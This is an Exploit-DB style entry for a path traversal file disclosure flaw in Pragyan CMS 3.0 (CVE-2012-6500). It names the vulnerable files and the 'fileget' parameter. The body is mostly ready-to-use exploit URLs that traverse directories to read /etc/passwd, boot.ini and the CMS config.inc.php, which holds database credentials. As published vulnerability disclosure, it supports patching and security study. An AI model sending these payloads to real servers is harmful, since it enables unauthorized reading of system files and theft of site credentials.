Pragyan CMS 3.0 - Remote File Disclosure

Author: Or4nG.M4N
type: webapps
platform: php
port: 
date_added: 2012-01-10 
date_updated: 2012-01-10 
verified: 0 
codes: OSVDB-82585;CVE-2012-6500 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comPragyanCMS-v3.0-beta.tar.bz2

Title
Pragyan CMS v 3.0 => [Remote File Disclosure]
Author
Or4nG.M4n
Download
http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2

vuln
download.lib.php line 16
vuln
index.php line 234

$_GET['fileget']

exploit  http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../  etc/passwd . boot.ini

Download Config file
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php